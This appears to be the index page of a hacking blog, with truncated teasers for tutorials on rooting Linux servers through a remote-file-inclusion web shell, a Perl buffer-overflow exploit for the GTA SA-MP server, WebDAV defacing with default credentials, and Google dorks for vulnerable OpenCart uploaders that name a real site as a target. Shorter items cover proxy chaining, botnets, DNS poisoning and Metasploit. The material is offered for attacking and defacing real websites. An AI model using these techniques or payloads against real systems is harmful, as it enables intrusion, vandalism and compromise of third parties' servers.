Server Rooting

This is a tutorial on rooting Linux servers with r57 shell (Or any other shell)Too bad not many sites are vulnerable these days =/-Suppose that we have found a site with R.F.I. vulnerability:http://www.hackedsite.com/folder/index.php?page=we can run shell exploiting Remote File Inclusion, as follows:http://www.hackedsite.com/folder/index.p...shell.php?where shell.php is our web shell that we have already uploaded toour site. (http://www.mysite.com)After we enter in shell, first of all we will see the version of the kernelat the top of the page or by typing: uname - a in Command line.To continue we must connect with backconnection to the box. This can done withtwo ways if we have the suitable shell.We can use the Back-Connect module of r57/c99 shell or to upload a backconnectorin a writable...

Read more »

hack GTA SAN ANDRES

# GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day)# Date: 9-26-11# Author: Silent_Dream# Software Link: http://team.sa-mp.com/files/samp03csvr_R2-2_win32.zip# Tested on: XP SP3, Windows 7# Thanks to: corelanc0d3r & team, Metasploit, Exploit-db.#No PPRs found (app compiled with safeseh on), so this exploit uses EIP overwrite instead.#392 bytes max payload space (after this you hit SEH), 3 badchars: 0x1a, 0x0d, 0x0a.#Triggering Details: Overwrite server.cfg with this file, run samp-server.exe, boom calculator!my $file = "server.cfg"; #file must be named server.cfg for bug to trigger.my $head = "echo "; #probably not needed, tweak if you want.my $junk = "\x41" x 379;my $eip = "\xaa\x9f\x42\x00"; #push esp/ret in samp-server.exemy $nops = "\x90" x 12;my $adjust = "\x81\xc4\x54\xf2\xff\xff";...

Read more »

How to chain multiple proxies

Introduction: This is a tutorial on chaining proxies for the use of becoming more anonymous while online. There aren’t enough tutorials online about this subject so I decided to make an attempt at writing one. Since it’s on the subject, I included a section on chaining wingates to become anonymous on telnet. ------------------------------------------------------------------------------------ I’m going to assume that most of you have already used a proxy before to hide your real IP address or domain or maybe just used one to surf anonymously online. If you didn’t, well hopefully you can keep up and possibly learn how to use a proxy. Its also best if you know what an IP address or Domain is first, before reading this tutorial. Hmm, I guess I have to show you where to find a proxy too. Well...

Read more »

Webdav Hacking & Defacing

Hi Guys ! Today i will explain you how to hack & deface webdav sites. Is really easy , and this tutorial will clearly show you how to do it.  Let's start... Open up the 'Map Network Drive' - Windows XP : Right click on My Computer - Windows 7 : Click the start bar Now it will show a new little window. Click on 'Sign up for online storage of conect to a network server' A new window will show up , click next. Again click next. Now here type in the server's IP or domain that has WebDav enabled. Ensure to put http:// and the webdav's directory. Otherwise it may not work. Then click next. Now you'll get a login prompt. Login with these credentials : User name : wampp Password : xampp And click OK. At the next window...

Read more »

Home » Wordpress Hacking » wordpress fckeditor upload Vunerablity : Upload Your Deface Remotly

This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here  1- open Google.com and enter Dork: inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html or nurl:Powered By OpenCart You'll Got a lot of websites by google, select anyone ... For Example i got this one http://www.schoolshopper.com.au/ Then i'll will simply add the vuln URL after the website  Examplehttp://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html (The path May be chnaged in other Website , Example site.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html) Now...

Read more »

.::Introduction to Bots and Botnets::.

.::Introduction to Bots and Botnets::.The word bot is an abbreviation of the word robot. Robots (automatized programs, not robots like Marvin the Paranoid Android) are frequently used in the Internet world. Spiders used by search engines to map websites and software responding to requests on IRC (such as eggdrop) are robots. Programs which respond autonomously to particular external events are robots, too. This article will describe a special kind of a robot, or bot (as we will call them from now on) – an IRC bot. It uses IRC networks as a communication channel in order to receive commands from a remote user. In this particular case the user is an attacker and the bot is a trojan horse. A good programmer can easily create his own bot, or customize an existing one. This will help hide the...

Read more »

DNS poisoning using Cain

Hey guys Smile this Tutorial is about DNS poisoning on your network using Cain & Abel.Download Cain here http://www.oxid.it/cain.htmlThis Tutorial Will be limited to just redirecting the traffic to another website.Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)First What is the DNS ? (wikipedia.org)The Domain Name System (DNS) is a hierarchical naming system forcomputers, services, or any resource connected to the internet or aprivate network. It associates various information with domain namesassigned to each of the participants. Most importantly, it translatesdomain names meaningful to humans into the numerical (binary)identifiers associated with networking equipment for the purpose oflocating and addressing these devices worldwide....

Read more »

Using metasploit and its exploits

Welcome again to another ultra noob edition production. :) I know everyone likes colors but I am indeed just going to be very straightforward since I'm in happy land right now. NOTE: I am not responsible for anything you do with this information. It is for educational purposes only. First off we are going to set up metasploit with postgresql. (which I use... but you can also use sqlite3 or mysql) These Structured Query Language (SQL) databases are going to be what hold the information of a target after scans and such. For those of you using windows, you can go here. Click Me! For this instalment of ultra noob edition i will be using blackbuntu. You can download blackbuntu here! To download backtrack you can go here! So once you...

Read more »

How to Get to Safe Mode in Windows XP/Vista/7

There are times when it is better to run Windows in what is known as “Safe Mode,” which is a diagnostic setup. Its purpose is to help troubleshoot computer problems by operating with a bare minimum of drivers and Windows components.Open Safe Mode with the F8 keyAll Windows versions can be booted into Safe Mode by this method. Note that it is somewhat tricky to time this procedure and it may take several attempts.1. Turn on or restart your computer.2. Hold down the F8 key before the Windows logo appears. If the computer makes a complaining noise, tap the F8 key repeatedly instead of holding it down.3. If a Windows logo or “Windows starting” appears, wait until Windows loads. Then restart the computer and try pressing  F8 again.4. Once you are successful, a menu will appear with a number...

Read more »

Learn Full Metasploit (Free Ebook By Ownedsec)

Learn Full Metasploit (Free Ebook By Ownedsec)First step to Last step $485 for free 'HACK THE PLANET' here is the linkhttp://adf.ly/35XQT NO SHARE CASH LINK...

Read more »